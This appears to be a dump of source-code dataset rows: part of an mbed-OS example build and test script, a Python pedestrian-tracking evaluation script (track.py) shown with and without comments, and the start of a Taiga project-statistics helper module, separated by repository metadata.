logging.error("mbed-cli deploy command failed for '%s'" % name)
return result
else:
logging.info("'%s' example directory doesn't exist. Skipping..." % name)
return 1
return 0
def export_repos(config, ides, targets, exp_filter):
results = {}
print("\nExporting example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
export_failures = []
build_failures = []
build_skips = []
successes = []
exported = True
pass_status = True
if example['export']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, IDE, and features combinations are valid and return a
# list of valid combinations to work through
for target, ide in target_cross_ide(valid_choices(example['targets'], targets),
valid_choices(example['exporters'], ides),
example['features'], example['toolchains']):
example_summary = {"name" : name, "target" : target, "ide" : ide }
summary_string = "%s %s %s" % (name, target, ide)
logging.info("Exporting %s" % summary_string)
cmd = ["mbed-cli", "export", "-i", ide, "-m", target]
logging.info("Executing command '%s'..." % " ".join(cmd))
proc = subprocess.Popen(cmd)
proc.wait()
if proc.returncode:
export_failures.append(example_summary)
logging.error("FAILURE exporting %s" % summary_string)
else:
logging.info("SUCCESS exporting %s" % summary_string)
logging.info("Building %s" % summary_string)
try:
if EXPORTERS[ide].build(name, cleanup=False):
logging.error("FAILURE building %s" % summary_string)
build_failures.append(example_summary)
else:
logging.info("SUCCESS building %s" % summary_string)
successes.append(example_summary)
except TypeError:
successes.append(example_summary)
build_skips.append(example_summary)
os.chdir(CWD)
if len(build_failures+export_failures) > 0:
pass_status= False
else:
exported = False
results[example['name']] = [exported, pass_status, successes,
export_failures, build_failures, build_skips]
return results
def compile_repos(config, toolchains, targets, profiles, verbose, exp_filter, cmake=False ,jobs=0):
results = {}
test_json = {"builds":{}}
base_path = os.getcwd()
print("\nCompiling example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
failures = []
successes = []
compiled = True
pass_status = True
if example['test']:
if not ('baud_rate' in example and 'compare_log'in example):
logging.warning("'baud_rate' or 'compare_log' keys are missing from config json file")
example['test'] = False
if example['compile']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, toolchain and features combinations are valid and return a
# list of valid combinations to work through
for target, toolchain in target_cross_toolchain(valid_choices(example['targets'], targets),
valid_choices(example['toolchains'], toolchains),
example['features']):
example_summary = {"name" : name, "target" : target, "toolchain" : toolchain, "test": "UNSET"}
summary_string = "%s %s %s" % (name, target, toolchain)
logging.info("Compiling %s" % summary_string)
if cmake:
build_command_seq = ["mbed-tools compile -t {} -m {} -c".format(toolchain, target)]
else:
build_command_seq = ["mbed-cli compile -t {} -m {} -j {} {}".format(toolchain, target, str(jobs), '-vv' if verbose else '') ]
if profiles:
for profile in profiles:
build_command_seq[0] += " --profile {}".format(profile)
failed_flag = False
for build_command in build_command_seq:
logging.info("Executing command '%s'..." % build_command)
proc = subprocess.Popen(build_command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
std_out, std_err = proc.communicate()
std_out = std_out.decode()
std_err = std_err.decode()
print ("\n#### STDOUT ####\n%s\n#### STDERR ####\n%s\n#### End of STDOUT/STDERR ####\n" % (std_out,std_err))
if proc.returncode:
failures.append(example_summary)
failed_flag = True
break
if not failed_flag:
if example['test']:
log = example['compare_log'].pop(0)
# example['compare_log'] is a list of log file/files, which matches each examples/sub-examples from same repo.
# pop the log file out of list regardless the compilation for each example pass of fail
image = fetch_output_image(std_out,cmake)
if image:
image_info = [{"binary_type": "bootable","path": normpath(join(name,image)),"compare_log":log}]
test_group = "{}-{}-{}".format(target, toolchain, example['baud_rate'])
if not test_group in test_json['builds']:
test_json['builds'][test_group] = {
"platform":target ,
"toolchain": toolchain ,
"base_path": base_path ,
"baud_rate": int(example['baud_rate']),
"tests":{} }
test_json['builds'][test_group]['tests'][name]={"binaries":image_info}
example_summary["test"] = "TEST_ON"
else:
logging.warning("could not find built image for example %s" % name)
example_summary["test"] = "NO_IMAGE"
else:
logging.warning("Test for %s will not be generated." % name)
example_summary["test"] = "TEST_OFF"
successes.append(example_summary)
os.chdir(CWD)
# If there are any compilation failures for the example 'set' then the overall status is fail.
if len(failures) > 0:
pass_status = False
else:
compiled = False
results[example['name']] = [compiled, pass_status, successes, failures]
write_json_to_file(test_json, "test_spec.json")
return results
def update_example_version(config, tag, exp_filter):
print("\nUpdating example to version(branch) '%s'\n" % tag)
for example in config['examples']:
name = example['name']
if name in exp_filter:
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "git checkout -B %s origin/%s" %(tag, tag)
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
return result
return 0
def symlink_mbedos(config, path, exp_filter):
print("\nCreating mbed-os Symbolic link to '%s'\n" % path)
for example in config['examples']:
if example['name'] not in exp_filter:
continue
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
if os.path.exists("mbed-os.lib"):
logging.info("Replacing 'mbed-os.lib' with empty file in '%s'" % name)
open("mbed-os.lib", 'w').close()
else:
logging.warning("No 'mbed-os.lib' found in '%s'" % name)
if os.path.exists("mbed-os"):
logging.warning("'mbed-os' already existed in '%s'" % name)
else:
logging.info("Creating Symbolic link '%s'->'mbed-os'" % path)
os.symlink(path, "mbed-os")
#Cmake tool currently require 'mbed-os.lib' to be present to perform build.
#Add a empty 'mbed-os.lib' as a workaround
open('mbed-os.lib', 'a').close()
os.chdir(CWD)
return 0
def fetch_output_image(output,cmake):
lines = output.splitlines()
last_index = -31 if len(lines)>29 else (-1 - len(lines))
for index in range(-1,last_index,-1):
if cmake:
if lines[index].startswith("-- built:") and lines[index].endswith(".bin"):
image = lines[index][10:]
print("IMAGE is " + image)
if os.path.isfile(image):
return os.path.relpath(image)
else:
if lines[index].startswith("Image:"):
image = lines[index][7:]
if os.path.isfile(image):
return image
return False
| true | true |
f72eb9f4639cbc1da62b470e79d10c5da4bfa8a1 | 9,904 | py | Python | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | import os
import os.path as osp
import cv2
import logging
import argparse
import motmetrics as mm
import torch
from tracker.multitracker import JDETracker
from utils import visualization as vis
from utils.log import logger
from utils.timer import Timer
from utils.evaluation import Evaluator
from utils.parse_config import parse_model_cfg
import utils.datasets as datasets
from utils.utils import *
def write_results(filename, results, data_type):
    """Write tracking results to *filename* in MOT or KITTI text format.

    *results* is an iterable of (frame_id, tlwhs, track_ids) tuples; rows
    with a negative track id are skipped. Raises ValueError for an unknown
    *data_type*.
    """
    formats = {
        'mot': '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n',
        'kitti': '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n',
    }
    if data_type not in formats:
        raise ValueError(data_type)
    save_format = formats[data_type]

    with open(filename, 'w') as f:
        for frame_id, tlwhs, track_ids in results:
            if data_type == 'kitti':
                frame_id -= 1  # KITTI frames are numbered from 0
            for tlwh, track_id in zip(tlwhs, track_ids):
                if track_id < 0:
                    continue
                x1, y1, w, h = tlwh
                x2, y2 = x1 + w, y1 + h
                f.write(save_format.format(frame=frame_id, id=track_id,
                                           x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h))
    logger.info('save results to {}'.format(filename))
def conversion_frame_init(opt,frame_rate):
    """Initialise the module-level tracking state used by conversion_frame().

    Must be called once before conversion_frame(); it creates the JDE
    tracker, the FPS timer and the per-frame result ring buffer.
    """
    global tracker,timer,results,frame_id,objopt,resultscamera
    objopt = opt
    tracker = JDETracker(opt, frame_rate=frame_rate)
    timer = Timer()
    results = []
    # Ring buffer for the most recent 1000 frames' results (see
    # conversion_frame, which indexes it with frame_id % 1000).
    resultscamera = [None] * 1000
    frame_id = 0
def conversion_frame(img, img0):
    """Run one tracking step on a single frame.

    Uses the module-level state created by conversion_frame_init().
    img is the preprocessed network input (numpy, moved to CUDA here);
    img0 is the original frame used for visualisation.
    Returns (annotated frame, (frame_id + 1, tlwh boxes, track ids)).
    """
    global tracker,timer,resultscamera,frame_id,objopt
    # run tracking
    timer.tic()
    blob = torch.from_numpy(img).cuda().unsqueeze(0)
    online_targets = tracker.update(blob, img0)
    online_tlwhs = []
    online_ids = []
    for t in online_targets:
        tlwh = t.tlwh
        tid = t.track_id
        # Discard implausible detections: too wide (aspect > 1.6) or too small.
        vertical = tlwh[2] / tlwh[3] > 1.6
        if tlwh[2] * tlwh[3] > objopt.min_box_area and not vertical:
            online_tlwhs.append(tlwh)
            online_ids.append(tid)
    timer.toc()
    # Store the result in the 1000-slot ring buffer.
    count = frame_id%1000
    resultscamera[count] = (frame_id + 1, online_tlwhs, online_ids)
    online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
                                  fps=1. / timer.average_time)
    frame_id += 1
    return online_im,resultscamera[count]
def eval_seq(opt, dataloader, data_type, result_filename, save_dir=None, show_image=True, frame_rate=30):
    '''
    Processes the video sequence given and provides the output of tracking result (write the results in video file)
    It uses JDE model for getting information about the online targets present.
    Parameters
    ----------
    opt : Namespace
        Contains information passed as commandline arguments.
    dataloader : LoadVideo
        Instance of LoadVideo class used for fetching the image sequence and associated data.
    data_type : String
        Type of dataset corresponding(similar) to the given video.
    result_filename : String
        The name(path) of the file for storing results.
    save_dir : String
        Path to the folder for storing the frames containing bounding box information (Result frames).
    show_image : bool
        Option for showing individual frames during run-time.
    frame_rate : int
        Frame-rate of the given video.
    Returns
    -------
    (frame_id, average step time, timer call count)
    '''
    if save_dir:
        mkdir_if_missing(save_dir)
    tracker = JDETracker(opt, frame_rate=frame_rate)
    timer = Timer()
    results = []
    frame_id = 0
    for path, img, img0 in dataloader:
        # Periodic progress log (every 20 frames).
        if frame_id % 20 == 0:
            logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1./max(1e-5, timer.average_time)))
        # run tracking
        timer.tic()
        blob = torch.from_numpy(img).cuda().unsqueeze(0)
        online_targets = tracker.update(blob, img0)
        online_tlwhs = []
        online_ids = []
        for t in online_targets:
            tlwh = t.tlwh
            tid = t.track_id
            # Discard implausible detections: too wide (aspect > 1.6) or too small.
            vertical = tlwh[2] / tlwh[3] > 1.6
            if tlwh[2] * tlwh[3] > opt.min_box_area and not vertical:
                online_tlwhs.append(tlwh)
                online_ids.append(tid)
        timer.toc()
        # save results
        results.append((frame_id + 1, online_tlwhs, online_ids))
        if show_image or save_dir is not None:
            online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
                                          fps=1. / timer.average_time)
        if show_image:
            cv2.imshow('online_im', online_im)
        if save_dir is not None:
            cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)
        frame_id += 1
    # save results
    write_results(result_filename, results, data_type)
    return frame_id, timer.average_time, timer.calls
def main(opt, data_root='/data/MOT16/train', det_root=None, seqs=('MOT16-05',), exp_name='demo',
         save_images=False, save_videos=False, show_image=True):
    """Run the JDE tracker on every sequence in ``seqs`` and evaluate the results.

    For each sequence: track with ``eval_seq``, write a MOT-format result file
    under ``<data_root>/../results/<exp_name>``, score it with py-motmetrics,
    and optionally encode the rendered frames into an ``.mp4``.  Finally print
    the combined MOT-challenge metric summary and save it as an ``.xlsx`` file.

    Note: ``det_root`` is accepted but never used in this function.
    """
    logger.setLevel(logging.INFO)
    result_root = os.path.join(data_root, '..', 'results', exp_name)
    mkdir_if_missing(result_root)
    data_type = 'mot'
    # Read config: network input size comes from the model cfg
    # (presumably the first, [net]-like section's width/height — confirm).
    cfg_dict = parse_model_cfg(opt.cfg)
    opt.img_size = [int(cfg_dict[0]['width']), int(cfg_dict[0]['height'])]
    # run tracking
    accs = []
    n_frame = 0
    timer_avgs, timer_calls = [], []
    for seq in seqs:
        output_dir = os.path.join(data_root, '..','outputs', exp_name, seq) if save_images or save_videos else None
        logger.info('start seq: {}'.format(seq))
        dataloader = datasets.LoadImages(osp.join(data_root, seq, 'img1'), opt.img_size)
        result_filename = os.path.join(result_root, '{}.txt'.format(seq))
        # Frame rate is parsed out of the sequence's seqinfo.ini metadata file.
        meta_info = open(os.path.join(data_root, seq, 'seqinfo.ini')).read()
        frame_rate = int(meta_info[meta_info.find('frameRate')+10:meta_info.find('\nseqLength')])
        nf, ta, tc = eval_seq(opt, dataloader, data_type, result_filename,
                              save_dir=output_dir, show_image=show_image, frame_rate=frame_rate)
        n_frame += nf
        timer_avgs.append(ta)
        timer_calls.append(tc)
        # eval: score the freshly written result file against ground truth.
        logger.info('Evaluate seq: {}'.format(seq))
        evaluator = Evaluator(data_root, seq, data_type)
        accs.append(evaluator.eval_file(result_filename))
        if save_videos:
            output_video_path = osp.join(output_dir, '{}.mp4'.format(seq))
            cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -c:v copy {}'.format(output_dir, output_video_path)
            os.system(cmd_str)
    # Overall FPS is the call-weighted average runtime over all sequences.
    timer_avgs = np.asarray(timer_avgs)
    timer_calls = np.asarray(timer_calls)
    all_time = np.dot(timer_avgs, timer_calls)
    avg_time = all_time / np.sum(timer_calls)
    logger.info('Time elapsed: {:.2f} seconds, FPS: {:.2f}'.format(all_time, 1.0 / avg_time))
    # get summary
    metrics = mm.metrics.motchallenge_metrics
    mh = mm.metrics.create()
    summary = Evaluator.get_summary(accs, seqs, metrics)
    strsummary = mm.io.render_summary(
        summary,
        formatters=mh.formatters,
        namemap=mm.io.motchallenge_metric_names
    )
    print(strsummary)
    Evaluator.save_summary(summary, os.path.join(result_root, 'summary_{}.xlsx'.format(exp_name)))
if __name__ == '__main__':
    # Command-line entry point: build tracker options, then run the benchmark
    # over MOT17-train sequences, or MOT16-test with --test-mot16.
    parser = argparse.ArgumentParser(prog='track.py')
    parser.add_argument('--cfg', type=str, default='cfg/yolov3.cfg', help='cfg file path')
    parser.add_argument('--weights', type=str, default='weights/latest.pt', help='path to weights file')
    parser.add_argument('--iou-thres', type=float, default=0.5, help='iou threshold required to qualify as detected')
    parser.add_argument('--conf-thres', type=float, default=0.5, help='object confidence threshold')
    parser.add_argument('--nms-thres', type=float, default=0.4, help='iou threshold for non-maximum suppression')
    parser.add_argument('--min-box-area', type=float, default=200, help='filter out tiny boxes')
    parser.add_argument('--track-buffer', type=int, default=30, help='tracking buffer')
    # NOTE(review): --test-mot16's help text ('tracking buffer') looks
    # copy-pasted from --track-buffer; confirm the intended description.
    parser.add_argument('--test-mot16', action='store_true', help='tracking buffer')
    parser.add_argument('--save-images', action='store_true', help='save tracking results (image)')
    parser.add_argument('--save-videos', action='store_true', help='save tracking results (video)')
    opt = parser.parse_args()
    print(opt, end='\n\n')
    if not opt.test_mot16:
        seqs_str = '''MOT17-02-SDP
                      MOT17-04-SDP
                      MOT17-05-SDP
                      MOT17-09-SDP
                      MOT17-10-SDP
                      MOT17-11-SDP
                      MOT17-13-SDP
                      '''
        data_root = '/home/wangzd/datasets/MOT/MOT17/images/train'
    else:
        seqs_str = '''MOT16-01
                      MOT16-03
                      MOT16-06
                      MOT16-07
                      MOT16-08
                      MOT16-12
                      MOT16-14'''
        data_root = '/home/wangzd/datasets/MOT/MOT16/images/test'
    seqs = [seq.strip() for seq in seqs_str.split()]
    # exp_name is derived from the parent directory of the weights file.
    main(opt,
         data_root=data_root,
         seqs=seqs,
         exp_name=opt.weights.split('/')[-2],
         show_image=False,
         save_images=opt.save_images,
         save_videos=opt.save_videos)
| 39.935484 | 119 | 0.601373 | import os
import os.path as osp
import cv2
import logging
import argparse
import motmetrics as mm
import torch
from tracker.multitracker import JDETracker
from utils import visualization as vis
from utils.log import logger
from utils.timer import Timer
from utils.evaluation import Evaluator
from utils.parse_config import parse_model_cfg
import utils.datasets as datasets
from utils.utils import *
def write_results(filename, results, data_type):
    """Dump per-frame tracking results to *filename* in MOT or KITTI text format.

    ``results`` is an iterable of ``(frame_id, tlwhs, track_ids)`` tuples;
    entries with a negative track id are skipped.  Raises ``ValueError`` for
    an unknown ``data_type``.
    """
    formats = {
        'mot': '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n',
        'kitti': '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n',
    }
    if data_type not in formats:
        raise ValueError(data_type)
    save_format = formats[data_type]
    with open(filename, 'w') as out:
        for frame_id, boxes, ids in results:
            if data_type == 'kitti':
                frame_id -= 1  # KITTI frame numbering starts at 0
            for box, tid in zip(boxes, ids):
                if tid < 0:  # unassigned / invalid track
                    continue
                left, top, width, height = box
                out.write(save_format.format(frame=frame_id, id=tid,
                                             x1=left, y1=top,
                                             x2=left + width, y2=top + height,
                                             w=width, h=height))
    logger.info('save results to {}'.format(filename))
def conversion_frame_init(opt,frame_rate):
    """Initialise module-level tracking state for frame-by-frame use.

    Creates a fresh JDETracker, timer and result buffers as module globals so
    that subsequent conversion_frame() calls can share them.
    """
    global tracker,timer,results,frame_id,objopt,resultscamera
    objopt = opt
    tracker = JDETracker(opt, frame_rate=frame_rate)
    timer = Timer()
    results = []
    # Ring buffer holding the 1000 most recent per-frame results.
    resultscamera = [None] * 1000
    frame_id = 0
def conversion_frame(img, img0):
    """Track one frame using the globals set up by conversion_frame_init().

    ``img`` is the network input array (presumably the preprocessed frame —
    confirm against the caller) and ``img0`` the original frame used for
    visualisation.  Returns ``(annotated_image, (frame_number, tlwhs, ids))``.
    """
    global tracker,timer,resultscamera,frame_id,objopt
    timer.tic()
    # Requires a CUDA device: the input blob is moved to the GPU for inference.
    blob = torch.from_numpy(img).cuda().unsqueeze(0)
    online_targets = tracker.update(blob, img0)
    online_tlwhs = []
    online_ids = []
    for t in online_targets:
        tlwh = t.tlwh
        tid = t.track_id
        # w/h > 1.6: despite the name, this flags *wide* boxes; those and
        # boxes below min_box_area are discarded.
        vertical = tlwh[2] / tlwh[3] > 1.6
        if tlwh[2] * tlwh[3] > objopt.min_box_area and not vertical:
            online_tlwhs.append(tlwh)
            online_ids.append(tid)
    timer.toc()
    # Store into the ring buffer slot keyed by frame number modulo 1000.
    count = frame_id%1000
    resultscamera[count] = (frame_id + 1, online_tlwhs, online_ids)
    online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
                                      fps=1. / timer.average_time)
    frame_id += 1
    return online_im,resultscamera[count]
def eval_seq(opt, dataloader, data_type, result_filename, save_dir=None, show_image=True, frame_rate=30):
    """Run the JDE tracker over an image sequence and write the results.

    Parameters
    ----------
    opt : Namespace
        Command-line options (model cfg, thresholds, min_box_area, ...).
    dataloader : iterable
        Yields ``(path, preprocessed_img, original_img)`` per frame.
    data_type : str
        Result file format, e.g. 'mot' or 'kitti'.
    result_filename : str
        Path of the text file the tracking results are written to.
    save_dir : str, optional
        If given, annotated frames are saved there as numbered JPEGs.
    show_image : bool
        Show each annotated frame in an OpenCV window while running.
    frame_rate : int
        Frame rate of the sequence, forwarded to the tracker.

    Returns
    -------
    tuple
        ``(frame_count, average_frame_time, timer_calls)``.
    """
    if save_dir:
        mkdir_if_missing(save_dir)
    tracker = JDETracker(opt, frame_rate=frame_rate)
    timer = Timer()
    results = []
    frame_id = 0
    for path, img, img0 in dataloader:
        if frame_id % 20 == 0:
            logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1./max(1e-5, timer.average_time)))
        # run tracking (requires a CUDA device)
        timer.tic()
        blob = torch.from_numpy(img).cuda().unsqueeze(0)
        online_targets = tracker.update(blob, img0)
        online_tlwhs = []
        online_ids = []
        for t in online_targets:
            tlwh = t.tlwh
            tid = t.track_id
            # w/h > 1.6 flags overly wide boxes; those and tiny boxes are dropped.
            vertical = tlwh[2] / tlwh[3] > 1.6
            if tlwh[2] * tlwh[3] > opt.min_box_area and not vertical:
                online_tlwhs.append(tlwh)
                online_ids.append(tid)
        timer.toc()
        # save results (frame ids in the output file are 1-based)
        results.append((frame_id + 1, online_tlwhs, online_ids))
        if show_image or save_dir is not None:
            online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
                                          fps=1. / timer.average_time)
            if show_image:
                cv2.imshow('online_im', online_im)
            if save_dir is not None:
                cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)
        frame_id += 1
    # save results
    write_results(result_filename, results, data_type)
    return frame_id, timer.average_time, timer.calls
def main(opt, data_root='/data/MOT16/train', det_root=None, seqs=('MOT16-05',), exp_name='demo',
         save_images=False, save_videos=False, show_image=True):
    """Track and evaluate every sequence in ``seqs``; write results and a metric summary.

    Note: ``det_root`` is accepted but never used in this function.
    """
    logger.setLevel(logging.INFO)
    result_root = os.path.join(data_root, '..', 'results', exp_name)
    mkdir_if_missing(result_root)
    data_type = 'mot'
    # Network input size is taken from the model cfg file.
    cfg_dict = parse_model_cfg(opt.cfg)
    opt.img_size = [int(cfg_dict[0]['width']), int(cfg_dict[0]['height'])]
    accs = []
    n_frame = 0
    timer_avgs, timer_calls = [], []
    for seq in seqs:
        output_dir = os.path.join(data_root, '..','outputs', exp_name, seq) if save_images or save_videos else None
        logger.info('start seq: {}'.format(seq))
        dataloader = datasets.LoadImages(osp.join(data_root, seq, 'img1'), opt.img_size)
        result_filename = os.path.join(result_root, '{}.txt'.format(seq))
        # Frame rate is parsed out of the sequence's seqinfo.ini metadata file.
        meta_info = open(os.path.join(data_root, seq, 'seqinfo.ini')).read()
        frame_rate = int(meta_info[meta_info.find('frameRate')+10:meta_info.find('\nseqLength')])
        nf, ta, tc = eval_seq(opt, dataloader, data_type, result_filename,
                              save_dir=output_dir, show_image=show_image, frame_rate=frame_rate)
        n_frame += nf
        timer_avgs.append(ta)
        timer_calls.append(tc)
        # Score the freshly written result file against ground truth.
        logger.info('Evaluate seq: {}'.format(seq))
        evaluator = Evaluator(data_root, seq, data_type)
        accs.append(evaluator.eval_file(result_filename))
        if save_videos:
            output_video_path = osp.join(output_dir, '{}.mp4'.format(seq))
            cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -c:v copy {}'.format(output_dir, output_video_path)
            os.system(cmd_str)
    # Overall FPS is the call-weighted average runtime over all sequences.
    timer_avgs = np.asarray(timer_avgs)
    timer_calls = np.asarray(timer_calls)
    all_time = np.dot(timer_avgs, timer_calls)
    avg_time = all_time / np.sum(timer_calls)
    logger.info('Time elapsed: {:.2f} seconds, FPS: {:.2f}'.format(all_time, 1.0 / avg_time))
    metrics = mm.metrics.motchallenge_metrics
    mh = mm.metrics.create()
    summary = Evaluator.get_summary(accs, seqs, metrics)
    strsummary = mm.io.render_summary(
        summary,
        formatters=mh.formatters,
        namemap=mm.io.motchallenge_metric_names
    )
    print(strsummary)
    Evaluator.save_summary(summary, os.path.join(result_root, 'summary_{}.xlsx'.format(exp_name)))
if __name__ == '__main__':
    # Command-line entry point: MOT17-train benchmark, or MOT16-test with --test-mot16.
    parser = argparse.ArgumentParser(prog='track.py')
    parser.add_argument('--cfg', type=str, default='cfg/yolov3.cfg', help='cfg file path')
    parser.add_argument('--weights', type=str, default='weights/latest.pt', help='path to weights file')
    parser.add_argument('--iou-thres', type=float, default=0.5, help='iou threshold required to qualify as detected')
    parser.add_argument('--conf-thres', type=float, default=0.5, help='object confidence threshold')
    parser.add_argument('--nms-thres', type=float, default=0.4, help='iou threshold for non-maximum suppression')
    parser.add_argument('--min-box-area', type=float, default=200, help='filter out tiny boxes')
    parser.add_argument('--track-buffer', type=int, default=30, help='tracking buffer')
    parser.add_argument('--test-mot16', action='store_true', help='tracking buffer')
    parser.add_argument('--save-images', action='store_true', help='save tracking results (image)')
    parser.add_argument('--save-videos', action='store_true', help='save tracking results (video)')
    opt = parser.parse_args()
    print(opt, end='\n\n')
    if not opt.test_mot16:
        seqs_str = '''MOT17-02-SDP
                      MOT17-04-SDP
                      MOT17-05-SDP
                      MOT17-09-SDP
                      MOT17-10-SDP
                      MOT17-11-SDP
                      MOT17-13-SDP
                      '''
        data_root = '/home/wangzd/datasets/MOT/MOT17/images/train'
    else:
        seqs_str = '''MOT16-01
                      MOT16-03
                      MOT16-06
                      MOT16-07
                      MOT16-08
                      MOT16-12
                      MOT16-14'''
        data_root = '/home/wangzd/datasets/MOT/MOT16/images/test'
    seqs = [seq.strip() for seq in seqs_str.split()]
    # exp_name is derived from the parent directory of the weights file.
    main(opt,
         data_root=data_root,
         seqs=seqs,
         exp_name=opt.weights.split('/')[-2],
         show_image=False,
         save_images=opt.save_images,
         save_videos=opt.save_videos)
| true | true |
f72ebb099171a1bdd6461c9a7537a443a6f2854c | 3,946 | py | Python | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | import datetime as dt
import sys
import matplotlib
import taiga_stats.constants as c
matplotlib.use("TkAgg") # Reference: https://stackoverflow.com/a/48374671/265508
DOT_HEADER_FMT = """digraph {:s} {{
labelloc="t";
//labelfontsize="40"
label="{:s}";
//size="7.5,10"
ratio="compress"
//orientation=landscape
"""
def get_tag_str(tag):
    """Return *tag* as a printable string; the match-all sentinel becomes ""."""
    if tag == c.TAG_MATCH_ALL:
        return ""
    return tag
def get_stories_with_tag(project, tag):
    """Return the project's user stories carrying *tag*.

    With the match-all sentinel every story is returned.  If nothing matches,
    a warning is printed to stderr and the process exits with status 1.
    """
    stories = project.list_user_stories()
    if tag == c.TAG_MATCH_ALL:
        matched = stories
    else:
        matched = [us for us in stories if us.tags and tag in us.tags]
    if not matched:
        print(
            "Warning: no userstories matching '{:s}' was found.".format(tag),
            file=sys.stderr,
        )
        sys.exit(1)
    return matched
def get_us_stauts_id_from_name(project, name):
    """Return the id of the user-story status called *name*, or None if absent."""
    return next(
        (s.id for s in project.list_user_story_statuses() if s.name == name),
        None,
    )
def get_us_status_name_from_id(project, status_id):
    """Return the name of the user-story status with *status_id*, or None."""
    return next(
        (s.name for s in project.list_user_story_statuses() if s.id == status_id),
        None,
    )
def remove_closed_stories(_project, uss):
    """Return only the user stories that are not closed (``_project`` is unused)."""
    return [us for us in uss if not us.is_closed]
def get_statuses_sorted_by_order(project):
    """Return the project's user-story statuses sorted ascending by ``order``."""
    def sort_key(status):
        return status.order
    return sorted(project.list_user_story_statuses(), key=sort_key)
def get_statuses_sorted_by_id(project):
    """Return the project's user-story statuses sorted ascending by ``id``."""
    def sort_key(status):
        return status.id
    return sorted(project.list_user_story_statuses(), key=sort_key)
def get_status_id_sorted(project):
    """Return the ids of all user-story statuses, ascending by kanban order."""
    return [s.id for s in get_statuses_sorted_by_order(project)]
def get_status_and_names_sorted(project):
    """Return parallel lists ``(ids, names)`` from highest to lowest order."""
    ids = list(reversed(get_status_id_sorted(project)))
    names = [get_us_status_name_from_id(project, sid) for sid in ids]
    return ids, names
def get_dot_header(name, title):
    """Render the Graphviz digraph opening for graph *name* labelled *title*."""
    return DOT_HEADER_FMT.format(name, title)
def get_dot_footer():
    """Return the closing brace terminating a Graphviz digraph."""
    return "}"
def read_daily_cfd(path, tag):
    """Read the tab-separated daily CFD data file for *tag* under *path*.

    Returns a list of columns: ``data[0]`` holds parsed dates, ``data[1]`` raw
    annotation strings, and later columns integer counts.  The first file row
    only determines the column count (header, not stored).  Exits the process
    with status 2 if the file cannot be read.
    """
    data_file = c.CFD_DATA_FILE_FMT.format(get_tag_str(tag))
    data_path = "{:s}/{:s}".format(path, data_file)
    data = []
    try:
        with open(data_path, "r", encoding="utf-8") as fdata:
            row = 0
            for line in fdata:
                line = line.rstrip()
                parts = line.split("\t")
                if row == 0:
                    # NOTE(review): one more column than the file has is
                    # allocated; the last list stays empty — presumably
                    # reserved for callers, confirm before changing.
                    data = [[] for _ in range(len(parts) + 1)]
                else:
                    for col in range(len(parts)):
                        value = parts[col]
                        if col == 0:  # First col is dates
                            value = dt.datetime.strptime(value, "%Y-%m-%d")
                        elif col == 1:  # Second col is annotations
                            pass
                        else:
                            value = int(value)
                        data[col].append(value)
                row += 1
    except IOError as e:
        print(
            "Could not read {:s}, error: {:s}".format(data_path, str(e)),
            file=sys.stderr,
        )
        sys.exit(2)
    return data
class assert_args:
    """Decorator validating that required keys exist (non-None) in an args mapping.

    Usage::

        @assert_args("output_dir", "tag")
        def cmd_foo(args): ...

    The wrapped function is invoked only when every required key is present
    and not ``None``; otherwise an error is printed and 1 is returned as an
    exit status.
    """

    def __init__(self, *args):
        # Names of the arguments that must be present and non-None.
        self.needed_args = args

    def __call__(self, func):
        dec = self

        def wrapper(args):
            for arg in dec.needed_args:
                if arg not in args or args[arg] is None:
                    # Fixed message quoting (was "''{:s}'").
                    print("Required argument '{:s}' was not supplied on commandline or set in config file.".format(arg))
                    return 1
            # Bug fix: propagate the wrapped command's return value (its exit
            # status) instead of silently returning None on success.
            return func(args)

        return wrapper
| 25.79085 | 121 | 0.582615 | import datetime as dt
import sys
import matplotlib
import taiga_stats.constants as c
matplotlib.use("TkAgg")
DOT_HEADER_FMT = """digraph {:s} {{
labelloc="t";
//labelfontsize="40"
label="{:s}";
//size="7.5,10"
ratio="compress"
//orientation=landscape
"""
def get_tag_str(tag):
    """Return *tag* for display; the match-all sentinel is shown as ""."""
    return "" if tag == c.TAG_MATCH_ALL else tag
